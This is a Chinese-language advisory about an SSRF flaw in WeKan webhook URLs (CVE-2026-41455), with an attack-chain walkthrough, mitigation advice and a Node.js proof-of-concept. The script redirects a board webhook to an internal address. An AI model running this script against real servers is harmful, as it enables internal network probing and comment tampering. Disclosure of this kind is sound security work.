CVE-2026-41455 CVSS 8.5 高危

CVE-2026-41455 WeKan SSRF漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41455

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WeKan

漏洞概述

WeKan 8.35之前的版本在webhook集成URL处理中存在服务器端请求伪造（SSRF）漏洞。该漏洞源于URL scheme字段缺乏协议限制或目标验证，允许攻击者将webhook URL设置为内部网络地址。这会导致服务器向攻击者控制的内部目标发送带有完整看板事件负载的HTTP POST请求。此外，攻击者还可以利用响应处理机制，绕过授权检查覆盖任意评论文本。

技术细节

该漏洞的核心在于WeKan处理Webhook集成URL时的验证逻辑缺失。当用户创建或修改集成时，系统未对URL schema字段进行严格的协议限制（如仅允许http/https）或目的地验证。攻击者只需拥有低权限账号，即可构造恶意请求，将Webhook URL修改为内网地址（如http://127.0.0.1/admin）。当触发看板事件时，服务器会向该内网地址发起HTTP POST请求，携带敏感的看板事件数据，从而实现SSRF攻击，探测内网服务或攻击内部基础设施。更严重的是，漏洞分析表明攻击者可以利用响应处理环节的特性，通过控制服务器的响应内容，在不进行授权检查的情况下覆盖任意评论文本，进一步破坏数据完整性。这种组合利用方式使得漏洞危害从单纯的内网探测升级为数据篡改。

攻击链分析

STEP 1

步骤1

攻击者获得WeKan实例的低权限用户账号，并能够访问看板。

STEP 2

步骤2

攻击者创建或修改看板的Webhook集成设置。

STEP 3

步骤3

攻击者将Webhook URL字段修改为内网地址（如 http://127.0.0.1/admin 或内部数据库端口）。

STEP 4

步骤4

攻击者在看板上触发一个事件（如移动卡片），服务器向内网地址发送POST请求，实现SSRF。

STEP 5

步骤5

攻击者利用响应处理机制，尝试覆盖评论文本，造成数据篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for WeKan SSRF (CVE-2026-41455)
// This script demonstrates how to update a webhook URL to point to an internal service.
// An attacker needs valid board edit permissions and an API token.

const fetch = require('node-fetch');

async function exploitSSRF(targetUrl, boardId, integrationId, apiToken) {
    // Construct the malicious internal URL
    const internalUrl = 'http://127.0.0.1:22'; // Attacker controlled internal target

    const headers = {
        'Authorization': `Bearer ${apiToken}`,
        'Content-Type': 'application/json'
    };

    const body = {
        'url': internalUrl,
        'isEnabled': true
    };

    try {
        const response = await fetch(`${targetUrl}/api/boards/${boardId}/integrations/${integrationId}`, {
            method: 'PUT',
            headers: headers,
            body: JSON.stringify(body)
        });

        if (response.ok) {
            console.log('[+] Webhook updated successfully. SSRF triggered on next board event.');
            console.log(`[+] Target set to: ${internalUrl}`);
        } else {
            console.log('[-] Failed to update webhook.');
        }
    } catch (error) {
        console.error('Error:', error);
    }
}

// Usage:
// exploitSSRF('http://target-wekan-url', 'BOARD_ID', 'INTEGRATION_ID', 'USER_API_TOKEN');

影响范围

WeKan < 8.35

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Webhook集成功能，或通过WAF/防火墙规则严格限制服务器发出的出站请求，禁止访问内网IP地址段（如127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表